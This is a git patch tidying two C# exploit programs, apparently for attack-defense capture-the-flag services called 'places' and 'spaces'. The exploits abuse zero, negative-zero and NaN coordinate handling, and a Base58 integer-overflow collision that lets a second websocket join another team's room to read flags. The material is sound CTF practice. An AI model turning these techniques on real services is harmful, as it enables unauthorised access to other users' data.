From dff4d7af44659cc319f488bea8cb60d4432bed81 Mon Sep 17 00:00:00 2001 From: Dmitriy Titarenko Date: Fri, 25 Aug 2023 10:07:43 +0500 Subject: [PATCH] sploits small fixes --- sploits/places/Program.cs | 38 ++++++++--------------------- sploits/spaces/Program.cs | 51 ++++++++++++++++----------------------- 2 files changed, 31 insertions(+), 58 deletions(-) diff --git a/sploits/places/Program.cs b/sploits/places/Program.cs index dd26a79b5..7d1ed2f70 100644 --- a/sploits/places/Program.cs +++ b/sploits/places/Program.cs @@ -16,6 +16,7 @@ HttpClient cookieClient; CookieContainer cookies; +// Using state for NaN places and other stuff, so no need to brute force values each round await using var stateStream = new FileStream("state.json", FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.Read); if(stateStream.Length > 0) state = (await JsonSerializer.DeserializeAsync(stateStream, jsonOptions))!; @@ -50,11 +51,11 @@ cookieClient = new HttpClient(new HttpClientHandler { UseCookies = true, CookieContainer = cookies }) { BaseAddress = baseUri }; // Add positive zero point - var p1PositiveZero = await PutAndReadStringAsync(cookieClient, new Place {Lat = 0.1337, Long = 0.0, Public = "pwn", Secret = "pwn"}); + var p1PositiveZero = await PutAndReadStringAsync(cookieClient, new Place(0.1337, 0.0, "pwn", "pwn")); await ColoredWriteLineAsync(Console.Error, " Positive zero [1]: " + p1PositiveZero, ConsoleColor.White); // Add negative zero point with the same other coord - var p2NegativeZero = await PutAndReadStringAsync(cookieClient, new Place {Lat = 0.1337, Long = -0.0, Public = "pwn", Secret = "pwn"}); + var p2NegativeZero = await PutAndReadStringAsync(cookieClient, new Place(0.1337, -0.0, "pwn", "pwn")); await ColoredWriteLineAsync(Console.Error, " Negative zero [2]: " + p2NegativeZero, ConsoleColor.White); cookies = new CookieContainer(); @@ -64,21 +65,21 @@ await ColoredWriteLineAsync(Console.Error, "Brute force NaN points..."); // Add some random point to start brute force from - var point = await PutAndReadStringAsync(cookieClient, new Place {Lat = 0.1337, Long = 0.1337, Public = "pwn", Secret = "pwn"}); + var point = await PutAndReadStringAsync(cookieClient, new Place(0.1337, 0.1337, "pwn", "pwn")); var (p5NanPoint, p4SomeOwnedPoint) = await BruteForceNanValueAsync(cookieClient, point); // Update non-existent random owned point in order to save it to the database - p4SomeOwnedPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly { Public = "pwn", Secret = "pwn" }, p4SomeOwnedPoint); + p4SomeOwnedPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly("pwn", "pwn"), p4SomeOwnedPoint); await ColoredWriteLineAsync(Console.Error, " Random point [4]: " + p4SomeOwnedPoint, ConsoleColor.White); // Update non-existent NaN point in order to save it to the database - p5NanPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly { Public = "pwn", Secret = "pwn" }, p5NanPoint); + p5NanPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly("pwn", "pwn"), p5NanPoint); await ColoredWriteLineAsync(Console.Error, " NaN point [5]: " + p5NanPoint, ConsoleColor.White); var p6NanPoint = p5NanPoint; await ColoredWriteLineAsync(Console.Error, "Same NaN point [6]: " + p6NanPoint, ConsoleColor.White); - state = new State { Cookie = max.Value, PositiveZero = p1PositiveZero, NegativeZero = p2NegativeZero, RndBeforeNan = p4SomeOwnedPoint, Nan = p5NanPoint }; + state = new State(max.Value, p1PositiveZero, p2NegativeZero, p4SomeOwnedPoint, p5NanPoint); await JsonSerializer.SerializeAsync(stateStream, state, jsonOptions); } @@ -154,25 +155,6 @@ async Task ColoredWriteLineAsync(TextWriter writer, string line, ConsoleColor co Console.ResetColor(); } -class State -{ - public string Cookie { get; set; } - public string PositiveZero { get; set; } - public string NegativeZero { get; set; } - public string RndBeforeNan { get; set; } - public string Nan { get; set; } -} - -class Place -{ - public double Lat { get; set; } - public double Long { get; set; } - public string? Public { get; set; } - public string? Secret { get; set; } -} - -class PlaceInfoOnly -{ - public string? Public { get; set; } - public string? Secret { get; set; } -} +record State(string Cookie, string PositiveZero, string NegativeZero, string RndBeforeNan, string Nan); +record Place(double Lat, double Long, string? Public, string? Secret); +record PlaceInfoOnly(string? Public, string? Secret); diff --git a/sploits/spaces/Program.cs b/sploits/spaces/Program.cs index 27aa29ed6..bb4acadb9 100644 --- a/sploits/spaces/Program.cs +++ b/sploits/spaces/Program.cs @@ -18,13 +18,14 @@ var cts = new CancellationTokenSource(); +var hostAndPort = args[0]; bool useSavedState = false; var cookies = new CookieContainer(); await using var stateStream = new FileStream("cookie.txt", FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.Read); if(stateStream.Length > 0) { using var reader = new StreamReader(stateStream); - cookies.Add(new Cookie("usr", await reader.ReadToEndAsync(), null, args[0])); + cookies.Add(new Cookie("usr", await reader.ReadToEndAsync(), null, hostAndPort.Split(':')[0])); useSavedState = true; } @@ -49,10 +50,10 @@ }); var ws1 = new ClientWebSocket(); -await ws1.ConnectAsync(new Uri($"ws://{args[0]}/ws"), hc, CancellationToken.None); +await ws1.ConnectAsync(new Uri($"ws://{hostAndPort}/ws"), hc, CancellationToken.None); var cookie = cookies.GetAllCookies().FirstOrDefault(c => c.Name == "usr")?.Value; -Console.WriteLine("Cookie: " + cookie); +await Console.Error.WriteLineAsync("Cookie: " + cookie); var flagRegex = new Regex(@"^TEAM\d{1,3}_[A-Z0-9]{32}$", RegexOptions.Compiled | RegexOptions.CultureInvariant); @@ -64,10 +65,10 @@ await Task.Delay(1000); try { - var msg = JsonSerializer.SerializeToUtf8Bytes(new Command { Type = MsgType.Generate }, jsonOptions); + var msg = JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Generate, null), jsonOptions); for(int k = 0; k < 10; k++) { - for(int i = 0; i <= 595; i++) + for(int i = 0; i <= 595; i++) // Use the number of iterations close to limit per minute { await ws1.SendAsync(msg, WebSocketMessageType.Text, true, cts.Token); if(i % 100 == 0) await Console.Error.WriteLineAsync($"send {i} msgs"); @@ -85,7 +86,7 @@ } await Task.Delay(1000); - await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command { Type = MsgType.Join }, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); + await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Join, null), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); await using var writer = new StreamWriter(stateStream); writer.Write(cookie); @@ -94,34 +95,37 @@ await Task.Delay(1000); var context = args[1]; -var pwn = FindOverflowedEqualValue(context.Split('/')[0]); -await Console.Error.WriteLineAsync(pwn); +var spaceIdToPwn = context.Split('/')[0]; +var pwn = FindOverflowedEqualValue(spaceIdToPwn); +await Console.Error.WriteLineAsync("" + pwn); -await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command {Type = MsgType.Room, Data = pwn}, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); +await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Room, pwn), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); await Task.Delay(1000); await Console.Error.WriteLineAsync("===== SECOND WS CONNECTION ====="); var ws2 = new ClientWebSocket(); -await ws2.ConnectAsync(new Uri($"ws://{args[0]}/ws"), CancellationToken.None); +await ws2.ConnectAsync(new Uri($"ws://{hostAndPort}/ws"), CancellationToken.None); CreateRecvThread(ws2).Start(); -await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command {Type = MsgType.Join, Data = pwn}, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); +await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Join, pwn), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); if(context.Contains('/')) { await Task.Delay(1000); - await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command { Type = MsgType.Room, Data = context.Split('/').Last() }, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); + var room = context.Split('/').Last(); + await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Room, room), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None); } await Task.Delay(3000); -string FindOverflowedEqualValue(string example) +string FindOverflowedEqualValue(string spaceIdToPwn) { - if(!Base58.TryDecodeUInt64(example, out var value)) + if(!Base58.TryDecodeUInt64(spaceIdToPwn, out var value)) throw new Exception("Invalid input"); var x = new BigInteger(value); + // Start finding Base58 string which decodes to the same Int64 from some random point greater than long.MaxValue Base58.TryDecodeBigInt("33333333333333333", out var from); for(int i = 0; i < 10005000; i++) { @@ -130,7 +134,6 @@ string FindOverflowedEqualValue(string example) if(!result.All(char.IsAsciiLetterLower)) continue; - Console.WriteLine(i + " " + result); if(!Base58.TryDecodeUInt64(result, out var check) || check != value) throw new Exception("Auto check failed"); @@ -140,6 +143,7 @@ string FindOverflowedEqualValue(string example) throw new Exception("Attempts limit exceeded"); } +// Processing received messages Thread CreateRecvThread(WebSocket ws) => new(async () => { var buffer = new byte[4096]; @@ -181,21 +185,8 @@ string FindOverflowedEqualValue(string example) } }); -public class Command -{ - public MsgType Type { get; set; } - public string Data { get; set; } -} - -internal class Message -{ - public MsgType Type { get; set; } - public string? Context { get; set; } - public string? Author { get; set; } - public string? Avatar { get; set; } - public string? Text { get; set; } - public DateTime Time { get; set; } -} +record Command(MsgType Type, string? Data); +record Message(MsgType Type, string? Context, string? Author, string? Avatar, string? Text, DateTime Time); public enum MsgType {